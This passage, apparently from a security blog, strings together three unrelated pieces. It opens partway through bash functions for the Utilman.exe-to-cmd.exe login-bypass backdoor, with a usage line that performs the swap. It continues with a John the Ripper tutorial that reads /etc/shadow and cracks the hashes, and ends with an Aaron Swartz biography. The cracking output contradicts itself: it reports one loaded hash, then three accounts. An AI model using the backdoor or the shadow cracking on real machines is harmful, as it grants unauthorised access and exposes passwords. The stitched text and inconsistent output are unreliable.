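# restore_utilman DIR: undo the swap. Do this before handing the machine back.
restore_utilman() {
    local sys32="$1/Windows/System32"
    [ -e "$sys32/Utilman.old" ] || { echo "nothing to restore under $sys32" >&2; return 1; }
    mv -f "$sys32/Utilman.old" "$sys32/Utilman.exe"
}

# utilman_is_cmd DIR: true when Utilman.exe is currently a byte-for-byte copy of cmd.exe.
# The same comparison, run against a known-good Windows, is a cheap check for this backdoor.
utilman_is_cmd() {
    local sys32="$1/Windows/System32"
    [ "$(md5sum < "$sys32/Utilman.exe")" = "$(md5sum < "$sys32/cmd.exe")" ]
}

# Usage from the live CD, as root (replace /dev/sda2 with the NTFS partition fdisk -l shows):
#   mount_windows /dev/sda2 /mnt/hda1 && swap_utilman /mnt/hda1 && umount /mnt/hda1 && reboot
# To undo later, boot the live CD again:
#   mount_windows /dev/sda2 /mnt/hda1 && restore_utilman /mnt/hda1 && umount /mnt/hda1
```

The functions take the mount point as an argument so they can be exercised against any directory tree laid out like a Windows volume; only mount_windows needs a real block device.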

Crack Offline Password Hashes With John The Ripper

What is It?:

John the Ripper is a free password cracking software tool. Initially developed for the UNIX operating system, it currently runs on fifteen different platforms (eleven architecture-specific flavors of Unix, DOS, Win32, BeOS, and OpenVMS).

It is one of the most popular password testing and cracking programs because it combines a number of password crackers into one package, auto-detects password hash types, and includes a customizable cracker.

It can be run against various hashed password formats, including the crypt(3) hash types most commonly found on Unix flavors (based on DES, MD5, or Blowfish), Kerberos/AFS, and the Windows NT/2000/XP/2003 LM hash. Additional modules (the “jumbo” patch) extend it to MD4-based hashes such as the Windows NT hash and to passwords stored in LDAP, MySQL, and others.

John The Ripper’s Modes:

  • Wordlist: John reads a file containing a list of candidate words and tries each one against the hashes, optionally mangled by word-mangling rules. See the RULES file in John’s documentation for the rule syntax.
  • Single crack: John builds candidates from the login name and GECOS (full name) fields of each account. It is fast and should be run first, and it is the reason John wants the unshadowed passwd file rather than the shadow file alone.
  • Incremental: the most powerful, and the slowest, mode. John tries every character combination, ordered by character frequency, and will run until stopped. Details about these modes, including how to define your own cracking methods, are in the MODES file in John’s documentation.

Tools Needed:

  • Copy Of Backtrack 5  (John The Ripper Is Included In Backtrack 5)
  • John The Ripper, available from http://www.openwall.com/john/

The first thing we need to do is get a list of hashes from somewhere. For this blog, and for demo purposes, we are going to use one from the NetForce security training site. (Shown Below)

[Screenshot: NetForce hash list]

The hash dump we are focusing on in this blog is the one with NetForce in the name and a traditional DES crypt(3) hash (13 characters, no “$” prefix) next to it. (Shown Below) Copy and paste it into a text document, one “user:hash” line per account, and save it in your root folder.

[Screenshot: the NetForce hash dump]

Next, for hashes taken from a Unix system, use the unshadow command to combine the /etc/passwd and /etc/shadow files so John can use them. You want this rather than the shadow file alone because the GECOS information lives only in /etc/passwd; without it “single crack” mode has nothing to work from, and the -shells option cannot be used either.

On a normal system you will need to run unshadow as root to be able to read the shadow file, so log in as root or use good old sudo. Type “sudo /usr/sbin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.txt” without quotes and press enter (the redirection is done by your own shell, not by sudo, which is fine for /tmp).

To use John, you just need to supply it the password file created by unshadow along with any desired options. If no mode is specified, John tries “single” first, then “wordlist” (with its default wordlist, password.lst) and finally “incremental”.
Type “john /tmp/crack.password.txt” without quotes and press enter (change the path to wherever your password hash file is located).

Our output looks like this:

  john /tmp/crack.password.txt
  Loaded 1 password (FreeBSD MD5 [32/32])

The format in parentheses is what John auto-detected; “FreeBSD MD5” means the hash begins with “$1$”, so this is the place to notice if you pasted the wrong dump. Cracking the hashes will take time, so please be patient! Pressing a key prints the current status, and Ctrl-C aborts but saves a restore point (resume with “john --restore”).

To see the cracked passwords when it is done, type “john --show /tmp/crack.password.txt” without quotes. (Shown Below)

  test:123456:1002:1002:test,,,:/home/test:/bin/bash
  didi:abc123:1003:1003::/home/didi:/usr/bin/rssh
  2 passwords cracked, 1 left
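As an added example, not from this post or from the John the Ripper project, the bash functions below show what the unshadow step actually does (a passwd/shadow merge written in awk), how to tell from a hash’s prefix which format John will report before you commit to a long run, and how the three modes above are run in order with a named session so an interrupted incremental run can be resumed. The user names, hashes, wordlist path and file names are constructed for the example.

```bash
#!/bin/bash
# Added example, not from the post or from John the Ripper itself. Shows what unshadow
# does, how to recognise a hash's format before a long run, and the post's three modes
# run in order. All user names, hashes and paths here are constructed for the example.

# merge_shadow PASSWD SHADOW: print each passwd line with its "x" password field replaced
# by the hash from the matching shadow entry. This is what unshadow(8) does, and it is why
# John then has the GECOS field to feed to "single crack" mode. Users with no shadow
# entry are printed unchanged.
merge_shadow() {
    awk -F: -v OFS=: '
        NR == FNR { hash[$1] = $2; next }     # first file (shadow): user -> hash
        ($1 in hash) { $2 = hash[$1] }        # second file (passwd): swap in the hash
        { print }
    ' "$2" "$1"
}

# hash_type HASH: name the crypt(3) scheme from its prefix. This mirrors the format John
# prints in its "Loaded N password hash(es) (...)" line; the post's run reported
# "FreeBSD MD5" because its hash began with $1$. A 13-character hash with no prefix is
# traditional DES crypt, the type in the NetForce dump. Locked accounts ("!" or "*") are
# skipped by John and are flagged here so you do not count them as targets.
hash_type() {
    case "$1" in
        '$1$'*)                   echo "md5crypt (FreeBSD MD5)" ;;
        '$2a$'*|'$2b$'*|'$2y$'*)  echo "bcrypt (OpenBSD Blowfish)" ;;
        '$5$'*)                   echo "sha256crypt" ;;
        '$6$'*)                   echo "sha512crypt" ;;
        ''|'!'*|'*'*)             echo "locked/no password" ;;
        *)  if [ "${#1}" -eq 13 ]; then echo "traditional DES crypt"; else echo "unknown"; fi ;;
    esac
}

# run_john MERGED WORDLIST: the three modes in the order John uses by default, but with a
# named session so an interrupted (Ctrl-C) incremental run can be resumed with
# "john --restore=audit". Cracked passwords accumulate in john.pot and --show reads them back.
run_john() {
    command -v john >/dev/null 2>&1 || { echo "john is not installed" >&2; return 1; }
    john --session=audit --single "$1" &&
    john --session=audit --wordlist="$2" --rules "$1" &&
    john --session=audit --incremental "$1"
    john --show "$1"
}

# Usage (as root, on the box whose accounts you are auditing; wordlist path is an assumption):
#   merge_shadow /etc/passwd /etc/shadow > /tmp/crack.password.txt
#   awk -F: '{ print $2 }' /tmp/crack.password.txt | while read -r h; do hash_type "$h"; done | sort | uniq -c
#   run_john /tmp/crack.password.txt /usr/share/john/password.lst
```

The hash_type tally is worth running before john: it tells you how many accounts are locked (and so not worth counting), and whether a slow format like bcrypt is in the mix, which changes how long incremental mode is worth running.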

That’s it! I hope you enjoyed reading, and as always don’t be evil!

Who was Aaron Swartz?


Aaron Swartz, born in Chicago, Illinois, has been described as a computer programmer, political organizer, and Internet activist. During his short life Swartz had many accomplishments, including co-founding the social media site Reddit, helping to develop the RSS web feed format and the web.py website framework, and becoming a research fellow at Harvard University in 2010. Swartz was also actively involved in promoting a free Internet, co-founding Demand Progress and helping to build Creative Commons. After facing federal charges of wire fraud and violations of the Computer Fraud and Abuse Act, Swartz committed suicide on January 11, 2013 at the age of twenty-six.

Swartz had always demonstrated an aptitude for computers and programming, beginning at an early age, and he advocated for the free flow of information in society. At the age of fourteen he took part in the group that developed the RSS 1.0 web syndication specification. Swartz also founded the software company Infogami, which merged with Reddit in 2005 and grew into the popular social media site. He also created the web.py website framework and co-founded Jottit, an online website creation application. In 2010 he became a research fellow at Harvard University’s Edmond J. Safra Research Lab on Institutional Corruption.

Besides his programming, Swartz was an ardent activist for the Internet and for free and open information sharing. He worked with Larry Lessig to develop Creative Commons, a non-profit organization devoted to the legal use and sharing of creative works. Swartz founded Watchdog.net for petitions and co-founded Demand Progress, an advocacy group that organizes people online for political change. Demand Progress launched a famous campaign against the Stop Online Piracy Act (SOPA) and the Protect IP Act (PIPA), collecting over 300,000 signatures against the bills alongside the protests of several other websites, and Swartz spoke at a Freedom to Connect event in Washington D.C. in 2012 after the defeat of SOPA. Swartz also developed the site theinfo.org.

On top of that, Swartz busied himself with retrieving large amounts of information and making it accessible online for free. He once paid for the complete bibliographic dataset from the Library of Congress and made it available by posting it on Open Library. In 2008 Swartz downloaded and released about twenty percent of the Public Access to Court Electronic Records (PACER) database, which contains U.S. federal court documents. The FBI investigated but decided not to press charges, since the documents are a matter of public record anyway.

Swartz ran into trouble, however, when he downloaded over four million academic journal articles from the database JSTOR. JSTOR archives journal articles, manuscripts, and GIS data and distributes them online; only those with access through an authorized institution can search the digital repository. Swartz accessed JSTOR through MIT’s computer network and downloaded the documents from a laptop connected to a network switch in a controlled-access closet. Authorities arrested Swartz near Harvard in January 2011.

In July of that year a federal grand jury charged Swartz with wire fraud, computer fraud, unlawfully obtaining information from a protected computer, and recklessly damaging a protected computer. Prosecutors also claimed that Swartz intended to make the documents available on a file-sharing site. He pleaded not guilty to all of the charges and was released on $100,000 bail. In September 2012 a superseding indictment raised the charges to thirteen felony counts. For these alleged crimes Swartz faced up to thirty-five years in prison and a $1 million fine.

Swartz struggled to pay his legal fees and stay afloat while fighting the Department of Justice. Larry Lessig’s wife, Bettina Neuefeind, established and organized a site to raise money for Swartz’s defense. Wired magazine suggested that the Department of Justice wanted to make an example of Swartz. After a two-year struggle, Swartz hanged himself in his Brooklyn apartment and was found dead on January 11, 2013. His last published blog post discussed the struggle against institutional corruption, but he also wrote a significant amount about working towards optimism and encouraged his readers to value mistakes.

In the aftermath of Swartz’s death, the hacktivist group Anonymous hijacked the homepage of the United States Sentencing Commission, an agency of the federal judiciary. The group cited the suicide of Aaron Swartz as having crossed a line and blamed the Justice Department for pushing him too far. Members of the group also hacked two websites on the MIT domain and replaced them with tributes to Swartz. In an ironic twist, his suicide came only two days after JSTOR announced the release of more than 4.5 million articles to the public.

Despite his untimely death, Aaron Swartz will be remembered as someone who made a significant contribution not only to the Internet but also to the movement dedicated to an open Internet and free access to information. Swartz co-founded Reddit and Jottit, helped build Creative Commons, and worked for political change through Demand Progress and Watchdog.net. Maybe Swartz’s greatest legacy is his effort to defeat the Stop Online Piracy Act. No matter how you look at it, Swartz had a large impact on the campaign for a free and open Internet.
